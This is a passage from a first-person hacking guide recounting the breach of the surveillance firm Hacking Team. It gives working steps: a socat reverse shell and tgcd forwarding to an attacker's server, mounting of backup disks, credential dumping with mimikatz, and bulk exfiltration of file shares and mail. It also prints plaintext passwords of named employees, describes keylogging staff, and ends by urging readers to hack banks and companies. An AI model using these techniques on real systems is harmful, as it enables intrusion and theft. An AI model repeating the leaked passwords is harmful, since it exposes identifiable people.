[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
--[ 6 - Be Prepared ]-----------------------------------------------------------
I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.
The post-exploitation tools that I'd prepared were:
1) busybox
For all the standard Unix utilities that the system didn't have.
2) nmap
To scan and fingerprint Hacking Team's internal network.
3) Responder.py
The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.
4) Python
To execute Responder.py
5) tcpdump
For sniffing traffic.
6) dsniff
For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
and NaGA, but it was hard to compile it for the system.
7) socat
For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
tcp:my_server:my_port
And useful for a lot more, it's a networking swiss army knife. See the
examples section of its documentation.
8) screen
Like the shell with pty, it wasn't really necessary, but I wanted to feel
at home in Hacking Team's network.
9) a SOCKS proxy server
To use with proxychains to be able to access their local network from any
program.
10) tgcd
For forwarding ports, like for the SOCKS server, through the firewall.
[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/
The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.
--[ 7 - Watch and Listen ]------------------------------------------------------
Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.
--[ 8 - NoSQL Databases ]-------------------------------------------------------
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5
They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.
[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/
--[ 9 - Crossed Cables ]--------------------------------------------------------
Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required
iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:
VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
--[ 10 - From backups to domain admin ]-----------------------------------------
What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz
--[ 11 - Downloading the mail ]-------------------------------------------------
With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.
[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
--[ 12 - Downloading Files ]----------------------------------------------------
Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:
proxychains smbclient '//192.168.1.230/FAE DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.
--[ 13 - Introduction to hacking windows domains ]------------------------------
Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.
----[ 13.1 - Lateral Movement ]-------------------------------------------------
I'll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].
[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
Remote Movement:
1) psexec
The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It's the most universal method (it works on any
windows computer with port 445 open), but it's also the least stealthy.
Event type 7045 "Service Control Manager" will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.
2) WMI
The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.
3) PSRemoting [10]
It's disabled by default, and I don't recommend enabling new protocols.
But, if the sysadmin has already enabled it, it's very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)
4) Scheduled Tasks
You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].
5) GPO
If all those protocols are disabled or blocked by the firewall, once you're
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we'll see with the computer of
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
open the firewall.
[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
"In place" Movement:
1) Token Stealing
Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].
2) MS14-068
You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].
3) Pass the Hash
If you have a user's hash, but they're not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.
4) Process Injection
Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
want.
5) runas
This is sometimes very useful since it doesn't require admin privileges.
The command is part of windows, but if you don't have a GUI you can use
powershell [8].
[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
----[ 13.2 - Persistence ]------------------------------------------------------
Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.
[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/
----[ 13.3 - Internal reconnaissance ]------------------------------------------
The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:
1) Downloading a list of file names
With a Domain Admin account, you can download a list of all filenames in
the network with powerview:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Later, you can read it at your leisure and choose which files to download.
2) Reading email
As we've already seen, you can download email with powershell, and it has a
lot of useful information.
3) Reading sharepoint
It's another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].
4) Active Directory [11]
It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.
5) Spy on the employees
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.
[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang
--[ 14 - Hunting Sysadmins ]----------------------------------------------------
Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.
[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
--[ 15 - The bridge ]-----------------------------------------------------------
Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).
[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78
--[ 16 - Reusing and resetting passwords ]--------------------------------------
Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.
--[ 17 - Conclusion ]-----------------------------------------------------------
That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.
Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.
Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.
[1] https://twitter.com/coracurrier/status/618104723263090688
--[ 18 - Contact ]--------------------------------------------------------------
To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.
[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537
only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----
If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

4975
owned and exposed/2.txt Normal file
View file

File diff suppressed because it is too large Load diff

13117
owned and exposed/3.txt Normal file
View file

File diff suppressed because it is too large Load diff